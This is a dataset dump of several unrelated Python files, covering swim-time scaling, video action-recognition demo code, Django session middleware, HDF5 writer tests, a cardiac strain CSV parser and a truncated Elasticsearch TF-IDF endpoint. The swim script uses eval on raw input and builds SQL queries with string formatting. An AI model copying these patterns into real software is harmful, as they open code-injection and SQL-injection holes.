bar\r\n team_counter += 1\r\n percent = float(team_counter) / float(len(teams_to_pull))\r\n show_loading_bar(percent)\r\n\r\n connection.commit()\r\n\r\n ####################################################################################################################\r\n # REMAINDER OF CODE HERE ISN'T USED FOR OUR PURPOSES #\r\n # this code doesn't work for relay swims #\r\n ####################################################################################################################\r\n\r\n get_event_times = \"SELECT time FROM Swims WHERE event='{}{}' AND date>{} AND date<{}\"\r\n update_with_scaled = \"UPDATE Swims SET scaled={} WHERE event='{}{}' AND date>{} AND date<{} AND time={}\"\r\n # fill out the scaled column\r\n print(\"Scaling times\")\r\n # convert each swim to a season z-score\r\n for simple_year in range(year_start, year_end):\r\n season_start_timestamp = convert_to_time(int(simple_year), SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n season_end_timestamp = convert_to_time(int(simple_year) + 1, SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n for event in events_to_pull:\r\n for gender in genders_to_pull:\r\n # calculate average times for each event by gender\r\n cursor.execute(get_event_times.format(gender, event, season_start_timestamp, season_end_timestamp))\r\n times = [x[0] for x in cursor.fetchall()]\r\n try:\r\n average = sum(times) / len(times)\r\n except ZeroDivisionError as e:\r\n print(\"No data was available on event {}\".format(event))\r\n continue\r\n print(\"average for {}{} in {}: {}\".format(gender, event, simple_year, average))\r\n # calculate z-score of times scored for this event-gender pairing\r\n sd = (sum([(x - average)**2 for x in times]) / len(times)) ** .5 # standard deviation\r\n update_list = [(x, (x - average) / sd) for x in times]\r\n for update in update_list:\r\n command = update_with_scaled.format(update[1], gender, event, season_start_timestamp,\r\n season_end_timestamp, update[0])\r\n cursor.execute(command)\r\n connection.commit()\r\n print(\"scaled\")\r\n\r\n print(\"\\nFinding taper swims\")\r\n for simple_year in range(year_start, year_end):\r\n season_start_timestamp = convert_to_time(int(simple_year), SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n season_end_timestamp = convert_to_time(int(simple_year) + 1, SEASON_LINE_MONTH, SEASON_LINE_DAY)\r\n print(\"Season {}-{}\".format(simple_year, simple_year + 1))\r\n print(\"From timestamp {} to {}\".format(season_start_timestamp, season_end_timestamp))\r\n for team_id in teams_to_pull:\r\n # get a list of all the days this team swam\r\n cursor.execute(\"SELECT date FROM Swims WHERE team={} AND date>{} AND date<{}\".format(team_id,\r\n season_start_timestamp,\r\n season_end_timestamp))\r\n dates = cursor.fetchall()\r\n dates = list(set(dates)) # this removes duplicates, which there are many\r\n meet_scores = [] # populate this with\r\n average_score = 0\r\n for date in dates:\r\n # first check if only one swimmer swam. this is indicative of a glitch where I\r\n # cannot isolate which roster a swimmer is in if they switched team.\r\n cursor.execute(\"SELECT count(*) FROM Swims WHERE team={} AND date={}\".format(team_id, date[0]))\r\n if cursor.fetchone()[0] != 7:\r\n # get the average scaled time for this day of swimming and add it to the list\r\n cursor.execute(\"SELECT avg(scaled) FROM Swims WHERE team={} AND date={}\".format(team_id, date[0]))\r\n meet_tuple = (cursor.fetchone()[0], date[0])\r\n average_score += meet_tuple[0]\r\n meet_scores.append(meet_tuple)\r\n average_score /= len(dates)\r\n for date in meet_scores:\r\n # a taper swim is a swim at a meet with a below average z-score for that season\r\n # this can be assumed because, given that a team has dual meets and taper meets\r\n # online, there will be a two-node normal distribution. the lower node contains\r\n # taper swims. we'll now update them in the database\r\n # Brad's interpretation of this:\r\n # If a swim was better than team average, give taper of 1, otherwise set taper to 2\r\n if date[0] < average_score:\r\n cursor.execute(\"UPDATE Swims SET taper=1 WHERE team={} AND date={}\".format(team_id, date[1]))\r\n else:\r\n cursor.execute(\"UPDATE Swims SET taper=2 WHERE team={} AND date={}\".format(team_id, date[1]))\r\n\r\n print(\"Finding outliers\")\r\n cursor.execute(\"UPDATE Swims SET taper=3 WHERE scaled>3\") # a lazy solution. I'm tired << let's fix that\r\n\r\n connection.commit()\r\n connection.close()\r\n\r\n\r\n# This function is meant for letting you choose the inputs that are used when calling get_swim_data. Feel free to mess\r\n# with it as you like\r\ndef inputs_for_swim_data_search(all_default=False):\r\n \"\"\"\r\n allows you to input values for get_swim_data as you like. if all_default is True you can input things manually\r\n upon calling the function. if it is False then it will just use default values listed in constants.py\r\n \"\"\"\r\n if all_default == True:\r\n events_to_pull = DEFAULT_EVENTS_TO_PULL\r\n genders_to_pull = DEFAULT_GENDER\r\n teams_to_pull = DEFAULT_TEAMS_TO_PULL\r\n year_start = DEFAULT_YEAR_START\r\n year_end = DEFAULT_YEAR_END\r\n database_file_name = DATABASE_FILE_NAME\r\n else:\r\n database_file_name = input(\"Use default database file? Y/N \")\r\n if database_file_name == \"Y\":\r\n database_file_name = DATABASE_FILE_NAME\r\n else:\r\n database_file_name = input(\"Type database file name here: \")\r\n # events_to_pull = input(\"Which events would you like to pull information on? Separate with spaces please \").split()\r\n teams_to_pull = []\r\n temp_val = input(\"Input colleges whose teams you would like to pull one at a time. \"\r\n \"Hit \\\"return\\\" after each entry.\\n1. \")\r\n while temp_val != (\"done\" or \"Done\"):\r\n teams_to_pull.append(temp_val)\r\n temp_val = input(\"\\n{}. \".format(len(teams_to_pull)+1))\r\n genders_to_pull = input(\"M, F, or M F? \").split()\r\n year_start = eval(input(\"Input start year\"))\r\n year_end = eval(input(\"Input end year\"))\r\n events_to_pull = DEFAULT_EVENTS_TO_PULL\r\n return get_swim_data(teams_to_pull, genders_to_pull, year_start, year_end, events_to_pull, database_file_name)\r\n\r\n\r\ndef main():\r\n inputs_for_swim_data_search(True)\r\n\r\n\r\nmain()\r\n","sub_path":"get_swim_data.py","file_name":"get_swim_data.py","file_ext":"py","file_size_in_byte":30207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"80446565","text":"import Lab1.parser.counter as counter\nimport Lab1.parser.words as xml\nimport Lab1.parser.request as request\nimport os\n\n\ndef parse_links_test():\n parsed_links = xml.parse_links(os.path.join(os.getcwd(), 'Lab1', 'test', 'links.file_reader'))\n expected_test_links = ['https://www.python.org/', 'https://nodejs.org', 'https://github.com/']\n assert len(parsed_links) == 3, 'Count of parsed links from file: \"links.file_reader\" is not equal with expected count'\n assert parsed_links[0] == expected_test_links[0], 'First link parsed from file is not equal with expected link'\n assert parsed_links[1] == expected_test_links[1], 'Second link parsed from file is not equal with expected link'\n assert parsed_links[2] == expected_test_links[2], 'Third link parsed from file is not equal with expected link'\n return '\\tfile_reader.file_reader.parse_links test'\n\n\ndef write_words_test():\n initial_content = request.read_links(['https://raw.githubusercontent.com/kirick1/cse/master/Lab1/test/test.txt'])\n counted_initial_content = counter.count_words(initial_content)\n xml.write_words(counted_initial_content, os.path.join(os.getcwd(), 'Lab1', 'test', 'counted.file_reader'))\n return '\\tfile_reader.file_reader.write_words test'\n","sub_path":"Lab1/test/xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"101228044","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\n\nimport numpy as np\nimport queue\nimport cv2\nimport torch\nimport tqdm\n\nfrom slowfast.utils import logging\nfrom slowfast.visualization.async_predictor import (\n AsycnActionPredictor,\n AsyncVis,\n)\nfrom slowfast.visualization.ava_demo_precomputed_boxes import (\n AVAVisualizerWithPrecomputedBox,\n)\nfrom slowfast.visualization.demo_loader import VideoReader\nfrom slowfast.visualization.predictor import ActionPredictor\nfrom slowfast.visualization.video_visualizer import VideoVisualizer\n\nlogger = logging.get_logger(__name__)\n\n\ndef run_demo(cfg, frame_provider):\n \"\"\"\n Run demo visualization.\n Args:\n cfg (CfgNode): configs. Details can be found in\n slowfast/config/defaults.py\n frame_provider (iterator): Python iterator that return task objects that are filled\n with necessary information such as `frames`, `id` and `num_buffer_frames` for the\n prediction and visualization pipeline.\n \"\"\"\n # Set random seed from configs.\n np.random.seed(cfg.RNG_SEED)\n torch.manual_seed(cfg.RNG_SEED)\n # Setup logging format.\n logging.setup_logging(cfg.OUTPUT_DIR)\n # Print config.\n logger.info(\"Run demo with config:\")\n logger.info(cfg)\n\n common_classes = (\n cfg.DEMO.COMMON_CLASS_NAMES\n if len(cfg.DEMO.LABEL_FILE_PATH) != 0\n else None\n )\n\n video_vis = VideoVisualizer(\n num_classes=cfg.MODEL.NUM_CLASSES,\n class_names_path=cfg.DEMO.LABEL_FILE_PATH,\n top_k=cfg.TENSORBOARD.MODEL_VIS.TOPK_PREDS,\n thres=cfg.DEMO.COMMON_CLASS_THRES,\n lower_thres=cfg.DEMO.UNCOMMON_CLASS_THRES,\n common_class_names=common_classes,\n colormap=cfg.TENSORBOARD.MODEL_VIS.COLORMAP,\n mode=cfg.DEMO.VIS_MODE,\n )\n\n async_vis = AsyncVis(video_vis, n_workers=cfg.DEMO.NUM_VIS_INSTANCES)\n\n if cfg.NUM_GPUS <= 1:\n model = ActionPredictor(cfg=cfg, async_vis=async_vis)\n else:\n model = AsycnActionPredictor(cfg, async_vis.task_queue)\n\n seq_len = cfg.DATA.NUM_FRAMES * cfg.DATA.SAMPLING_RATE\n\n assert (\n cfg.DEMO.BUFFER_SIZE <= seq_len // 2\n ), \"Buffer size cannot be greater than half of sequence length.\"\n num_task = 0\n for able_to_read, task in frame_provider:\n if not able_to_read:\n break\n num_task += 1\n\n model.put(task)\n\n try:\n frames = async_vis.get()\n num_task -= 1\n yield frames\n except queue.Empty:\n continue\n # hit Esc to quit the demo.\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n while num_task != 0:\n try:\n frames = async_vis.get()\n num_task -= 1\n yield frames\n except queue.Empty:\n continue\n # hit Esc to quit the demo.\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n\ndef demo(cfg):\n \"\"\"\n Run inference on an input video or stream from webcam.\n Args:\n cfg (CfgNode): configs. Details can be found in\n slowfast/config/defaults.py\n \"\"\"\n # AVA format-specific visualization with precomputed boxes.\n if cfg.DETECTION.ENABLE and cfg.DEMO.PREDS_BOXES != \"\":\n precomputed_box_vis = AVAVisualizerWithPrecomputedBox(cfg)\n precomputed_box_vis()\n else:\n frame_provider = VideoReader(cfg)\n\n for frames in tqdm.tqdm(run_demo(cfg, frame_provider)):\n for frame in frames:\n frame_provider.display(frame)\n frame_provider.clean()\n","sub_path":"tools/demo_net.py","file_name":"demo_net.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"565358483","text":"# Python's Libraries\nimport time\nimport pytz\nfrom datetime import datetime\n\n# Django's Libraries\nfrom django.conf import settings\nfrom django.contrib.auth.views import redirect_to_login\nfrom django.contrib.sessions.models import Session\nfrom django.core.exceptions import ObjectDoesNotExist\n\ntry:\n from django.utils.deprecation import MiddlewareMixin\nexcept ImportError:\n MiddlewareMixin = object\n\nSESSION_TIMEOUT_KEY = \"_session_init_timestamp_\"\n\n\nclass SessionControlMiddleware(MiddlewareMixin):\n def process_request(self, request):\n if not hasattr(request, \"session\") or request.session.is_empty():\n return\n\n init_time = request.session.setdefault(\n SESSION_TIMEOUT_KEY, time.time()\n )\n\n expire_seconds = getattr(\n settings, \"SESSION_EXPIRE_SECONDS\", settings.SESSION_COOKIE_AGE\n )\n\n session_is_expired = time.time() - init_time > expire_seconds\n\n if session_is_expired:\n request.session.flush()\n return redirect_to_login(next=request.path)\n\n expire_since_last_activity = getattr(\n settings, \"SESSION_EXPIRE_AFTER_LAST_ACTIVITY\", False\n )\n grace_period = getattr(\n settings, \"SESSION_EXPIRE_AFTER_LAST_ACTIVITY_GRACE_PERIOD\", 1\n )\n\n if expire_since_last_activity \\\n and time.time() - init_time > grace_period:\n request.session[SESSION_TIMEOUT_KEY] = time.time()\n\n\nclass OnlyOneSessionMiddleware:\n\n # Called only once when the web server starts\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n # Code to be executed for each request before\n # the view (and later middleware) are called.\n if request.user.is_authenticated:\n stored_session_key = request.user.session_key\n\n # if there is a stored_session_key in our database and it is\n # different from the current session, delete the stored_session_key\n # session_key with from the Session table\n if stored_session_key \\\n and stored_session_key \\\n != request.session.session_key:\n try:\n session = Session.objects.get(\n session_key=stored_session_key\n )\n session.delete()\n except ObjectDoesNotExist:\n print(\"No existe sesión activa\")\n\n request.user.session_key = \\\n request.session.session_key\n\n request.user.last_activity = \\\n datetime.fromtimestamp(\n request.session[SESSION_TIMEOUT_KEY],\n tz=pytz.utc\n )\n\n request.user.save()\n print(\"Se crea sessión\")\n\n response = self.get_response(request)\n\n # This is where you add any extra code to be executed for each request/response after\n # the view is called.\n # For this tutorial, we're not adding any code so we just return the response\n\n return response\n","sub_path":"Utils/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"130093079","text":"# Imports: standard library\nfrom typing import List, Tuple\n\n# Imports: third party\nimport h5py\nimport numpy as np\nimport pytest\n\n# Imports: first party\nfrom ingest.icu.writers import Writer\nfrom tensorize.edw.data_objects import EDWType, ICUDataObject\nfrom tensorize.bedmaster.data_objects import BedmasterType\n\n# pylint: disable=protected-access\n\n\ndef get_visit_id() -> str:\n return str(np.random.randint(1000000000, 9999999999))\n\n\ndef get_attributes(signal: ICUDataObject) -> Tuple[List[str], List[str]]:\n signal_keys = [attr for attr in dir(signal) if not attr.startswith(\"_\")]\n array_keys = [\n attr\n for attr in signal_keys\n if isinstance(getattr(signal, attr), (np.ndarray, dict))\n ]\n attr_keys = list(set(signal_keys) - set(array_keys))\n return array_keys, attr_keys\n\n\ndef test_set_visit_id(temp_file, fake_signal):\n static_data = fake_signal.get_static_data()\n measurement = fake_signal.get_measurement()\n\n expected_error_message = \"Visit ID not found. Please, check that you have set one.\"\n\n visit_id = get_visit_id()\n with Writer(temp_file.name, visit_id=visit_id) as writer:\n writer.write_static_data(static_data)\n writer.write_signal(measurement)\n\n with Writer(temp_file.name) as writer:\n with pytest.raises(Exception) as e_info:\n writer.write_static_data(static_data)\n assert str(e_info.value) == expected_error_message\n with pytest.raises(Exception) as e_info:\n writer.write_signal(measurement)\n assert str(e_info.value) == expected_error_message\n\n writer.set_visit_id(visit_id)\n writer.write_static_data(static_data)\n writer.write_signal(measurement)\n\n\ndef test_write_static_data(temp_file, fake_signal):\n static_data = fake_signal.get_static_data()\n visit_id = get_visit_id()\n\n with Writer(temp_file.name) as writer:\n writer.set_visit_id(visit_id)\n assert len(writer[\"edw\"][visit_id].attrs) == 0\n writer.write_static_data(static_data)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n base_dir = output_file[\"edw\"][visit_id]\n assert len(base_dir.attrs) == 20\n for key in base_dir.attrs.keys():\n if isinstance(base_dir.attrs[key], np.ndarray):\n assert np.array_equal(\n base_dir.attrs[key],\n getattr(static_data, key.lower()),\n )\n else:\n assert base_dir.attrs[key] == getattr(static_data, key.lower())\n\n\ndef test_write_data(temp_file, fake_signal):\n measurement = fake_signal.get_measurement()\n medication = fake_signal.get_medication()\n procedure = fake_signal.get_procedure()\n bedmaster_signal = fake_signal.get_bedmaster_signal()\n\n visit_id = get_visit_id()\n with Writer(temp_file.name) as writer:\n writer.set_visit_id(visit_id)\n writer.write_signal(measurement)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n base_dir = output_file[\"edw\"][visit_id][measurement._source_type.lower()]\n assert list(base_dir.keys()) == [measurement.name.lower()]\n signal_dir = base_dir[measurement.name.lower()]\n\n arrays, attrs = get_attributes(measurement)\n assert_dir(signal_dir, measurement, arrays, attrs)\n\n signals = [medication, procedure, bedmaster_signal]\n with Writer(temp_file.name, visit_id=visit_id) as writer:\n for signal in signals:\n writer.write_signal(signal)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n for signal in signals:\n if isinstance(signal, BedmasterType):\n signal_source = \"bedmaster\"\n elif isinstance(signal, EDWType):\n signal_source = \"edw\"\n else:\n raise ValueError(f\"Signal type {type(signal)} not Bedmaster or EDW\")\n base_dir = output_file[signal_source][visit_id]\n signal_base_dir = base_dir[signal._source_type.lower()]\n signal_name = signal.name.replace(\"/\", \"|\").lower()\n assert list(signal_base_dir.keys()) == [signal_name]\n\n arrays, attrs = get_attributes(signal)\n signal_dir = signal_base_dir[signal_name]\n assert_dir(signal_dir, signal, arrays, attrs)\n\n\ndef test_name_conflict(temp_file, fake_signal):\n\n m1_signal = fake_signal.get_measurement()\n m2_signal = fake_signal.get_measurement()\n\n m2_signal.source = \"EDW_med\"\n\n assert m1_signal.name == m2_signal.name\n assert m1_signal.source != m2_signal.source\n\n visit_id = get_visit_id()\n with Writer(temp_file.name) as writer:\n writer.set_visit_id(visit_id)\n writer.write_signal(m1_signal)\n writer.write_signal(m2_signal)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n m1_dir = output_file[\"edw\"][visit_id][m1_signal._source_type.lower()]\n m2_dir = output_file[\"edw\"][visit_id][m2_signal._source_type.lower()]\n\n def _test(m_dir, m_signal):\n assert list(m_dir.keys()) == [m_signal.name.lower()]\n signal_dir = m_dir[m_signal.name.lower()]\n arrays, attrs = get_attributes(m_signal)\n assert sorted(list(signal_dir.keys())) == sorted(arrays)\n for key in arrays:\n expected = getattr(m_signal, key.lower())\n if isinstance(expected, dict):\n for k in expected:\n assert k.lower() in signal_dir[key]\n else:\n value = signal_dir[key][()]\n assert np.array_equal(value, expected)\n for attr in attrs:\n value = signal_dir.attrs[attr]\n expected = getattr(m_signal, attr.lower())\n assert np.array_equal(value, expected)\n\n _test(m1_dir, m1_signal)\n _test(m2_dir, m2_signal)\n\n\ndef test_write_multiple_files(temp_file, fake_signal):\n visit_id = get_visit_id()\n\n wv_signal1 = fake_signal.get_bedmaster_signal()\n wv_signal2 = fake_signal.get_bedmaster_signal()\n wv_arrays, wv_attr = get_attributes(wv_signal1)\n\n with Writer(temp_file.name, visit_id=visit_id) as writer:\n writer.write_signal(wv_signal1)\n writer.write_signal(wv_signal2)\n\n with h5py.File(temp_file.name, \"r\") as output_file:\n wv_base_dir = output_file[\"bedmaster\"][visit_id][\"waveform\"]\n wv_name = wv_signal1.name.replace(\"/\", \"|\").lower()\n assert sorted(list(wv_base_dir.keys())) == [wv_name]\n\n wv_signal_dir = wv_base_dir[wv_name]\n\n assert sorted(list(wv_signal_dir.attrs.keys())) == sorted(wv_attr)\n\n for field in wv_attr:\n assert wv_signal_dir.attrs[field] == getattr(wv_signal1, field)\n\n assert sorted(list(wv_signal_dir.keys())) == sorted(wv_arrays)\n for field in wv_signal_dir:\n if field == \"sample_freq\":\n continue\n value = wv_signal_dir[field][()]\n expected = np.concatenate(\n (\n getattr(wv_signal1, field.lower()),\n getattr(wv_signal2, field.lower()),\n ),\n )\n assert len(value) == len(expected)\n assert np.array_equal(value, expected)\n\n corrected_sf2 = np.fromiter(\n [(sf, idx + wv_signal1.value.size) for sf, idx in wv_signal2.sample_freq],\n dtype=\"float,int\",\n )\n expected_sf = np.concatenate([wv_signal2.sample_freq, corrected_sf2])\n assert np.array_equal(wv_signal_dir[\"sample_freq\"][()], expected_sf)\n\n\ndef assert_dir(\n signal_dir: h5py.Group,\n signal: ICUDataObject,\n names: List[str],\n attrs: List[str],\n):\n assert sorted(list(signal_dir.keys())) == sorted(names)\n for field in signal_dir:\n expected = getattr(signal, field.lower())\n if isinstance(expected, dict):\n for k in expected:\n assert k.lower() in signal_dir[field]\n else:\n value = signal_dir[field][()]\n assert np.array_equal(value, expected)\n\n assert sorted(list(signal_dir.attrs.keys())) == sorted(attrs)\n for field in attrs:\n assert signal_dir.attrs[field] == getattr(signal, field)\n","sub_path":"tests/icu_ingest/test_writer.py","file_name":"test_writer.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"419905273","text":"#===============================================================================\n# @brief Config platform Sconscript\n# Copyright (c) 2017 NEUL LIMITED\n#===============================================================================\n\nImport('env')\nimport os\nfrom EnvironmentUtils import NeulTargetConfig, BuildType\nfrom ModuleUtils import Module\n\nmodule = 'config_platform'\nsource_files = []\n\nif (NeulTargetConfig.get_build_core(env) in ['application_core']):\n additional_release_file_list = Glob(os.path.join('sdk', NeulTargetConfig.get_build_chip(env), '*.json'))\nelse:\n additional_release_file_list = []\n\nif NeulTargetConfig.get_build_type(env) in [BuildType.SOURCE_PACKAGE,BuildType.DOXYGEN]:\n mod = Module(module, env,\n sources = source_files,\n public_inc_dirs = [],\n private_inc_dirs = [],\n additional_release_files = additional_release_file_list )\n\n product = mod.build(env)\n Return ('product')\nelse:\n Return('source_files')\n","sub_path":"4.Network_Communication/TCPsendAndReceiveData/ProjectTCP/src/config/platform/SConscript","file_name":"SConscript","file_ext":"Network_Communication/TCPsendAndReceiveData/ProjectTCP/src/config/platform/SConscript","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340755380","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 10 15:59:41 2019\r\n\r\n@author: vjha1\r\n\"\"\"\r\n\r\ndef LV2(filename):\r\n import pandas as pd\r\n import numpy as np\r\n import csv\r\n\r\n\r\n df = pd.read_csv (filename)\r\n data1 = df.to_numpy()\r\n\r\n #Global Results Table RV2D, LV2D, LV3D\r\n Globewhere = np.argwhere(data1 == \"Global\")\r\n \r\n LVSax = data1[Globewhere[0,0]]\r\n LVSax = LVSax.tolist()\r\n del LVSax[0:2]\r\n #print(RVSax)\r\n \r\n LVLax = data1[Globewhere[1,0]]\r\n LVLax = LVLax.tolist()\r\n del LVLax[0:2]\r\n #print(RVLax)\r\n \r\n LV3D = data1[Globewhere[2,0]]\r\n LV3D = LV3D.tolist()\r\n del LV3D[0:2]\r\n #skip data1[Globewhere[2,0]]\r\n \r\n RVSax = data1[Globewhere[3,0]]\r\n RVSax = RVSax.tolist()\r\n del RVSax[0:2]\r\n #print(LVSax)\r\n \r\n RVLax = data1[Globewhere[4,0]]\r\n RVLax = RVLax.tolist()\r\n del RVLax[0:2]\r\n #print(LVLax)\r\n \r\n RV3DRadial = [0]*2\r\n RV3DRadialp = data1[Globewhere[18,0]]\r\n RV3DRadialp = RV3DRadialp.tolist()\r\n RV3DRadialp.pop(0)\r\n del RV3DRadialp[20:26]\r\n #RV3DRadial1 = np.array(RV3DRadial)\r\n #float(RV3DRadial)\r\n #print(RV3DRadialp)\r\n RV3DRadialp = max(RV3DRadialp, key=float)\r\n \r\n RV3DRadialrate = data1[Globewhere[19,0]]\r\n RV3DRadialrate = RV3DRadialrate.tolist()\r\n RV3DRadialrate.pop(0)\r\n del RV3DRadialrate[20:26]\r\n #print(RV3DRadialrate)\r\n RV3DRadialrate = max(RV3DRadialrate, key=float)\r\n \r\n RV3DRadial = [RV3DRadialp, RV3DRadialrate]\r\n \r\n RV3DCircum = [0]*2\r\n \r\n RV3DCircump = data1[Globewhere[22,0]]\r\n RV3DCircump = RV3DCircump.tolist()\r\n RV3DCircump.pop(0)\r\n del RV3DCircump[20:26]\r\n RV3DCircump = min(RV3DCircump, key=float)\r\n \r\n \r\n RV3DCircumrate = data1[Globewhere[23,0]]\r\n RV3DCircumrate = RV3DCircumrate.tolist()\r\n RV3DCircumrate.pop(0)\r\n del RV3DCircumrate[20:26]\r\n RV3DCircumrate = min(RV3DCircumrate, key=float)\r\n \r\n RV3DCircum = [RV3DCircump, RV3DCircumrate]\r\n \r\n RV3DLong = [0]*2\r\n \r\n RV3DLongp = data1[Globewhere[26,0]]\r\n RV3DLongp = RV3DLongp.tolist()\r\n RV3DLongp.pop(0)\r\n del RV3DLongp[20:26]\r\n RV3DLongp = min(RV3DLongp, key=float)\r\n \r\n RV3DLongrate = data1[Globewhere[27,0]]\r\n RV3DLongrate = RV3DLongrate.tolist()\r\n RV3DLongrate.pop(0)\r\n del RV3DLongrate[20:26]\r\n RV3DLongrate = min(RV3DLongrate, key=float)\r\n \r\n RV3DLong = [RV3DLongp, RV3DLongrate]\r\n \r\n \r\n torsionwhere = np.argwhere(data1 == \"torsion\")\r\n RVTorsion = data1[torsionwhere[1,0]]\r\n RVTorsion = RVTorsion.tolist()\r\n RVTorsion.pop(0)\r\n del RVTorsion[20:26]\r\n RVTorsion = max(RVTorsion, key=float)\r\n #print(RVTorsion)\r\n \r\n LVTorsion = data1[torsionwhere[0,0]]\r\n LVTorsion = LVTorsion.tolist()\r\n LVTorsion.pop(0)\r\n #print(LVTorsion)\r\n del LVTorsion[20:26]\r\n LVTorsion = max(LVTorsion, key=float)\r\n \r\n #print(LVTorsion)\r\n \r\n patientwhere = np.argwhere(data1 == \"Patient\")\r\n pnamefull = data1[patientwhere[0,0]]\r\n pnamefull = pnamefull.tolist()\r\n pnamefull.pop(0)\r\n fullname = pnamefull[0]\r\n Name = fullname.split(',')\r\n \r\n birthdatewhere = np.argwhere(data1 == \"Birth Date\")\r\n bdate = data1[birthdatewhere[0,0]]\r\n bdate = bdate.tolist()\r\n bdate.pop(0)\r\n \r\n IDwhere = np.argwhere(data1 == \"PatientID\")\r\n pid = data1[IDwhere[0,0]]\r\n pid = pid.tolist()\r\n pid.pop(0)\r\n \r\n Sdatewhere = np.argwhere(data1 == \"Study Date\")\r\n Sdate = data1[Sdatewhere[0,0]]\r\n Sdate = Sdate.tolist()\r\n Sdate.pop(0)\r\n \r\n #LV Measurements\r\n #Search: EDV, ESV, SV,HR,CO,EF,MyoMass_diast\r\n \r\n edvwhere = np.argwhere(data1 == \"EDV\")\r\n edv = data1[edvwhere[0,0]]\r\n edv = edv.tolist()\r\n edv.pop(0)\r\n \r\n esvwhere = np.argwhere(data1 == \"ESV\")\r\n esv = data1[esvwhere[0,0]]\r\n esv = esv.tolist()\r\n esv.pop(0)\r\n \r\n svwhere = np.argwhere(data1 == \"SV\")\r\n sv = data1[svwhere[0,0]]\r\n sv = sv.tolist()\r\n sv.pop(0)\r\n \r\n hrwhere = np.argwhere(data1 == \"HR\")\r\n hr = data1[hrwhere[0,0]]\r\n hr = hr.tolist()\r\n hr.pop(0)\r\n \r\n COwhere = np.argwhere(data1 == \"CO\")\r\n co = data1[COwhere[0,0]]\r\n co = co.tolist()\r\n co.pop(0)\r\n \r\n EFwhere = np.argwhere(data1 == \"EF\")\r\n ef = data1[EFwhere[0,0]]\r\n ef = ef.tolist()\r\n ef.pop(0)\r\n \r\n LVMwhere = np.argwhere(data1 == \"MyoMass_diast\") \r\n lvm = data1[LVMwhere[0,0]]\r\n lvm = lvm.tolist()\r\n lvm.pop(0)\r\n \r\n #Assemble data into single list\r\n procdata = [Name[0], Name[1], Sdate[0], \"1\",\"Vibhav\",\"nan\", \"nan\", pid[0], bdate[0], \r\n hr[0], edv[0], esv[0], sv[0], ef[0], co[0], lvm[0], LVLax[2], LVLax[8], \r\n LV3D[2], LV3D[8], LVSax[1], LVSax[7], LV3D[1], \r\n LV3D[7], LVSax[0], LVLax[0], LVSax[6], LVLax[6], \r\n LV3D[0], LV3D[6], LVTorsion, RVLax[2], RVLax[8],RV3DLong[0], \r\n RV3DLong[1], RVSax[1], RVSax[7], RV3DCircum[0], RV3DCircum[1], \r\n RVSax[0], RVLax[0], RVSax[6], RVLax[6], RV3DRadial[0], \r\n RV3DRadial[1], RVTorsion]\r\n \r\n print(procdata)\r\n \r\n with open(\"FHS_autodata.csv\", \"a\", newline=\"\") as fp:\r\n writer = csv.writer(fp)\r\n writer.writerow(procdata)","sub_path":"lvfirst.py","file_name":"lvfirst.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511164052","text":"from flask import Blueprint\r\n\r\nmod = Blueprint('api_tfidf',__name__)\r\n\r\n\r\nfrom flask_api import FlaskAPI\r\nimport cx_Oracle\r\nimport xml.etree.ElementTree as ET\r\nfrom elasticsearch import Elasticsearch\r\nimport lxml.etree as ET2\r\n\r\n\r\napp=FlaskAPI(__name__)\r\n\r\n@mod.route('/', defaults={'path' : ''})\r\n@mod.route('//tfidf', methods = ['GET'])\r\ndef tfidf(schema):\r\n\r\n \r\n import numpy as np\r\n import re\r\n\r\n # Acesso ao banco Elastic Search\r\n dbes = Elasticsearch([{'host' : 'localhost', 'port' : 9200}])\r\n \r\n\r\n print('Acesso ao banco Elasticsearch')\r\n CorpusTotal = []\r\n \r\n query={\"query\": {\"match_all\":{}}}\r\n banco_cand = dbes.search(index = schema+'_pool_candidatos',doc_type = 'candidatos',scroll='10m',search_type = 'query_then_fetch', size=10, body=query)\r\n sid = banco_cand['_scroll_id']\r\n scroll_size = len(banco_cand['hits']['hits'])\r\n \r\n \r\n banco_vagas = dbes.search(index = schema+'_pool_vagas', doc_type = 'vagas', size=1000)\r\n\r\n \r\n # Limpeza do texto, retirando caracteres e união em uma string por documento\r\n \r\n candidatos_corpus = []\r\n vagas_corpus = []\r\n \r\n def limpador1(banco_cand):\r\n for doc in banco_cand['hits']['hits']:\r\n \r\n texto = doc['_source']['text']\r\n \r\n cand_corpus=[]\r\n for bloco_tex in texto:\r\n \r\n curri = re.sub(\"[0-9]\", ' ', bloco_tex)\r\n curri = re.sub(\"[+.*@:,?/;% \\n]\", ' ', curri)\r\n curri = curri.lower() # letra minúscula\r\n curri = curri.split() # separação das palavras\r\n curri = ' '.join(curri) # União do bloco\r\n cand_corpus.append(curri)\r\n cand_corpus=' '.join(cand_corpus) # União 1 string por doc \r\n candidatos_corpus.append(cand_corpus)\r\n return candidatos_corpus \r\n \r\n #Limpeza do texto, retirando caracteres e união em uma string por documento\r\n \r\n def limpador2(banco_vagas):\r\n for doc 